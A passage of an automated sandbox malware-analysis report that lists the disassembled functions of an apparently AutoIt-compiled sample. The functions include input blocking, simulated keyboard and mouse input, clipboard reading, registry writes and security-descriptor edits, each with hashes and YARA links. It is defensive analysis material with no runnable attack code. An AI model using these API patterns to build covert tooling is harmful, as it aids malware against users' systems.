PostMessageW.USER32(00000000,00000101,00000000), ref: 0103AC74
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0103ACC6

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 193165305aa3b43e39188de519a2615257efd2876c212a6602e79eb8c4d7d178
Instruction ID: 9dd1878bdabc5d9ed73ff7b1dc56508a41f4d07f91573ae32e669b6efcb5c30c
Opcode Fuzzy Hash: 193165305aa3b43e39188de519a2615257efd2876c212a6602e79eb8c4d7d178
Instruction Fuzzy Hash: F331E330B2461CEFFB358A6988087FE7AADABC9320F08425AE4C5D71D1C37989858B51

Function 0104EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0104EABD

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 54025ea59407de34651efe8f09bfcdfb05e8182cc7e32413509749a45a110a39
Instruction ID: 4d1aac7f34563379c58b5edebf32929b05adc75eea9791c17a8f02b0563446dc
Opcode Fuzzy Hash: 54025ea59407de34651efe8f09bfcdfb05e8182cc7e32413509749a45a110a39
Instruction Fuzzy Hash: 5CE01A752002059FD710EF59D844E9AB7E9BF98760F048426FD89C7361DA78B8408BA0

Function 0103E355 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0103E37E

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: bea9f07d9111ced970e9fef2ae11e3f770ce8fed831e919e95e78262694d6245
Instruction ID: f5bb6715def672c96469aac6b50a97fd8419349b1a6def3e97f7b910dbfd277d
Opcode Fuzzy Hash: bea9f07d9111ced970e9fef2ae11e3f770ce8fed831e919e95e78262694d6245
Instruction Fuzzy Hash: 71D05EF21902017DFABD0A3CCE2FF7A298CE381580F40D789B2C189599DA91A4444021

Function 01052ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 01052B30
DeleteObject.GDI32(00000000), ref: 01052B43
DestroyWindow.USER32 ref: 01052B52
GetDesktopWindow.USER32 ref: 01052B6D
GetWindowRect.USER32(00000000), ref: 01052B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 01052CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 01052CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052CF8
GetClientRect.USER32(00000000,?), ref: 01052D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01052D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052D80
GlobalLock.KERNEL32(00000000), ref: 01052D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052D98
GlobalUnlock.KERNEL32(00000000), ref: 01052DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052DA8
GlobalFree.KERNEL32(00000000), ref: 01052DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0106FC38,00000000), ref: 01052DDB
GlobalFree.KERNEL32(00000000), ref: 01052DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 01052E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 01052E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0105303F

Strings

AutoIt v3, xrefs: 01052CF2
static, xrefs: 01052D3A, 01052E91
DISPLAY, xrefs: 01052EA2
, xrefs: 01052FC5

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: b298e345b099385fc7e3b7562d9cdc17a4e6a52c2a00a8c74cca2ae9e3550d9f
Instruction ID: 9b77dd510a6a82686d86d67bb73d1fa96cca34699dccd04ebc3eaefa7b5c80cf
Opcode Fuzzy Hash: b298e345b099385fc7e3b7562d9cdc17a4e6a52c2a00a8c74cca2ae9e3550d9f
Instruction Fuzzy Hash: 75028E71500205EFEB24DF64DD89EAE7BB9FF48310F048159F995AB2A5C779AD00CB60

Function 00FE8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00FE8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 01026AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 01026AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01026F43

Part of subcall function 00FE8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FE8BE8,?,00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 00FE8FC5

SendMessageW.USER32(?,00001053), ref: 01026F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 01026F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 01026FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 01026FB7

Strings

0, xrefs: 01026DCF

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: ab4f3fedc18391296773d8f8d45b0fc9016b28a71bf6f8926ae9ba1ed94eb7ed
Instruction ID: 21859283a6d864f675cad6f2e71377f5ca167c457d49190ab5b78ce7b56a31cb
Opcode Fuzzy Hash: ab4f3fedc18391296773d8f8d45b0fc9016b28a71bf6f8926ae9ba1ed94eb7ed
Instruction Fuzzy Hash: 2012E130500261EFEB65EF18C944BAABBE5FF44300F5440A9F9D98B251CB37E892DB91

Function 01052711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0105273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0105286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 010528A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 010528B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 01052900
GetClientRect.USER32(00000000,?), ref: 0105290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 01052955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01052964
GetStockObject.GDI32(00000011), ref: 01052974
SelectObject.GDI32(00000000,00000000), ref: 01052978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 01052988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01052991
DeleteDC.GDI32(00000000), ref: 0105299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010529C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 010529DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 01052A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01052A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 01052A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 01052A77
GetStockObject.GDI32(00000011), ref: 01052A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01052A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 01052A97

Strings

AutoIt v3, xrefs: 010528F8
static, xrefs: 0105294F, 01052A71
DISPLAY, xrefs: 0105295A
msctls_progress32, xrefs: 01052A13

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 012b8629689e56df49f105a73240deaabfec823fb1038365e50160bad4d3f2ac
Instruction ID: b0cabe63f3f54d8e32ccda6f9547ad5010c9e16992c3cb2e97d3c8536ea89e44
Opcode Fuzzy Hash: 012b8629689e56df49f105a73240deaabfec823fb1038365e50160bad4d3f2ac
Instruction Fuzzy Hash: F2B16EB2A00215AFEB24DFA8DD45FAF7BA9EF08710F048155F994EB290D779AD40CB50

Function 01044ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 01044AED
GetDriveTypeW.KERNEL32(?,0106CB68,?,\\.\,0106CC08), ref: 01044BCA
SetErrorMode.KERNEL32(00000000,0106CB68,?,\\.\,0106CC08), ref: 01044D36

Strings

Network, xrefs: 01044C02
ATA, xrefs: 01044C98
SSD, xrefs: 01044C4A
Fibre, xrefs: 01044CAD
ATAPI, xrefs: 01044C91
PhysicalDrive, xrefs: 01044B76
SSA, xrefs: 01044CA6
Removable, xrefs: 01044C10, 01044C15
SCSI, xrefs: 01044C8A
CDROM, xrefs: 01044BFB
FileBackedVirtual, xrefs: 01044CEC
Fixed, xrefs: 01044C09
iSCSI, xrefs: 01044CC2
Unknown, xrefs: 01044BED, 01044C83
RAMDisk, xrefs: 01044BF4
MMC, xrefs: 01044CDE
SAS, xrefs: 01044CC9
SATA, xrefs: 01044CD0
\\.\, xrefs: 01044B3F
Virtual, xrefs: 01044CE5
RAID, xrefs: 01044CBB
USB, xrefs: 01044CB4
1394, xrefs: 01044C9F

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 9cb6fb7bcf4f2bf0d15c6d93913defd8969c43befe488502580df0044ee9a344
Instruction ID: cfaef0f1c7f03ea917a6479f34bb3816c143fe7d9ceacac0f51f1a388583ad93
Opcode Fuzzy Hash: 9cb6fb7bcf4f2bf0d15c6d93913defd8969c43befe488502580df0044ee9a344
Instruction Fuzzy Hash: FF61D5B0A0410ADBCF44EF68CAD1A7C77E2AB04241B18406AF8D6EF251DB76DD85EB45

Function 00FE8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FE8968
GetSystemMetrics.USER32(00000007), ref: 00FE8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FE899B
GetSystemMetrics.USER32(00000008), ref: 00FE89A3
GetSystemMetrics.USER32(00000004), ref: 00FE89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FE89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FE89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FE8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FE8A3C
GetClientRect.USER32(00000000,000000FF), ref: 00FE8A5A
GetStockObject.GDI32(00000011), ref: 00FE8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE8A81

Part of subcall function 00FE912D: GetCursorPos.USER32(?), ref: 00FE9141
Part of subcall function 00FE912D: ScreenToClient.USER32(00000000,?), ref: 00FE915E
Part of subcall function 00FE912D: GetAsyncKeyState.USER32(00000001), ref: 00FE9183
Part of subcall function 00FE912D: GetAsyncKeyState.USER32(00000002), ref: 00FE919D

SetTimer.USER32(00000000,00000000,00000028,00FE90FC), ref: 00FE8AA8

Strings

AutoIt v3 GUI, xrefs: 00FE8A20

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d12f93b8e39db3b9f19fcbc79a5bdad6fbec09333fa5fb118325a56213f03e93
Instruction ID: 41490ee076fb3da37e1ba7acbfe40458069257e9faec2b6a7bd32e07b6e2ca8d
Opcode Fuzzy Hash: d12f93b8e39db3b9f19fcbc79a5bdad6fbec09333fa5fb118325a56213f03e93
Instruction Fuzzy Hash: E6B1A075A0024AAFDF14DFA8DD45BAE3BB4FB48310F004229FA95A7294DB79D941CF50

Function 01030D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 010310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01031114
Part of subcall function 010310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031120
Part of subcall function 010310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 0103112F
Part of subcall function 010310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031136
Part of subcall function 010310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0103114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01030DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01030E29
GetLengthSid.ADVAPI32(?), ref: 01030E40
GetAce.ADVAPI32(?,00000000,?), ref: 01030E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01030E96
GetLengthSid.ADVAPI32(?), ref: 01030EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 01030EB5
HeapAlloc.KERNEL32(00000000), ref: 01030EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 01030EDD
CopySid.ADVAPI32(00000000), ref: 01030EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01030F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01030F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 01030F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030F6E
HeapFree.KERNEL32(00000000), ref: 01030F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030F7E
HeapFree.KERNEL32(00000000), ref: 01030F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030F8E
HeapFree.KERNEL32(00000000), ref: 01030F95
GetProcessHeap.KERNEL32(00000000,?), ref: 01030FA1
HeapFree.KERNEL32(00000000), ref: 01030FA8

Part of subcall function 01031193: GetProcessHeap.KERNEL32(00000008,01030BB1,?,00000000,?,01030BB1,?), ref: 010311A1
Part of subcall function 01031193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01030BB1,?), ref: 010311A8
Part of subcall function 01031193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01030BB1,?), ref: 010311B7

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 702ca66c9a2a8f01bc8cae3c0c93fcf803ec147bf6671a5ca34ff184eb63c867
Instruction ID: ac70894b7f71885295e8db43a5edd818989a79e8ed9ba1056220e8e878cfd0f2
Opcode Fuzzy Hash: 702ca66c9a2a8f01bc8cae3c0c93fcf803ec147bf6671a5ca34ff184eb63c867
Instruction Fuzzy Hash: 94717D7290120AAFEF209FA8DD44FEEBBBCBF46300F044155FA99E6194D7359905CB60

Function 0105C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0105C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0106CC08,00000000,?,00000000,?,?), ref: 0105C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0105C5A4
_wcslen.LIBCMT ref: 0105C5F4
_wcslen.LIBCMT ref: 0105C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0105C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0105C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0105C84D
RegCloseKey.ADVAPI32(?), ref: 0105C881
RegCloseKey.ADVAPI32(00000000), ref: 0105C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0105C960

Strings

REG_QWORD, xrefs: 0105C8C3
REG_EXPAND_SZ, xrefs: 0105C5CD
REG_DWORD, xrefs: 0105C804
REG_MULTI_SZ, xrefs: 0105C6F5
REG_BINARY, xrefs: 0105C913
REG_SZ, xrefs: 0105C644

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: dee1494c184c249ceba4f2069cb526dbb4cde85dee0359b0449e29751246d378
Instruction ID: 59057bb9cb61483ffeb1a057f444c47820baa0703fec2e80c740737b15a4a1c5
Opcode Fuzzy Hash: dee1494c184c249ceba4f2069cb526dbb4cde85dee0359b0449e29751246d378
Instruction Fuzzy Hash: 58125C356043019FE754DF18C981B2AB7E5EF88714F08889DF98A9B3A2DB35ED41DB81

Function 0104EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0106CC08), ref: 0104EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0104EB37
GetClipboardData.USER32(0000000D), ref: 0104EB43
CloseClipboard.USER32 ref: 0104EB4F
GlobalLock.KERNEL32(00000000), ref: 0104EB87
CloseClipboard.USER32 ref: 0104EB91
GlobalUnlock.KERNEL32(00000000), ref: 0104EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0104EBC9
GetClipboardData.USER32(00000001), ref: 0104EBD1
GlobalLock.KERNEL32(00000000), ref: 0104EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0104EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0104EC38
GetClipboardData.USER32(0000000F), ref: 0104EC44
GlobalLock.KERNEL32(00000000), ref: 0104EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0104EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0104EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0104ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0104ECF3
CountClipboardFormats.USER32 ref: 0104ED14
CloseClipboard.USER32 ref: 0104ED59

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: af356c85b48413c976a48fa90e705547dd5df30db7f98e805ecb1a454da7077f
Instruction ID: dc144dbfdbe9f37e9a226ad207f2f95fd2f0d7d0f292ce05aa7a27932d7e13a5
Opcode Fuzzy Hash: af356c85b48413c976a48fa90e705547dd5df30db7f98e805ecb1a454da7077f
Instruction Fuzzy Hash: BF61E7742043019FE310EF68D984F6A7BE5BF88704F08456EF5D6872A5CB79E905CBA2

Function 0106091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 010609C6
_wcslen.LIBCMT ref: 01060A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01060A54
_wcslen.LIBCMT ref: 01060A8A
_wcslen.LIBCMT ref: 01060B06
_wcslen.LIBCMT ref: 01060B81

Part of subcall function 00FEF9F2: _wcslen.LIBCMT ref: 00FEF9FD

Part of subcall function 01032BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 01032BFA

Strings

GETTOTALCOUNT, xrefs: 010609F2, 01060A17
COLLAPSE, xrefs: 01060B01, 01060B1C
CHECK, xrefs: 01060A85, 01060AA0
GETSELECTED, xrefs: 01060C4E
GETITEMCOUNT, xrefs: 01060C1E
EXPAND, xrefs: 01060BF8
GETTEXT, xrefs: 01060C97
UNCHECK, xrefs: 01060D3E
SELECT, xrefs: 01060D11
ISCHECKED, xrefs: 01060CE1
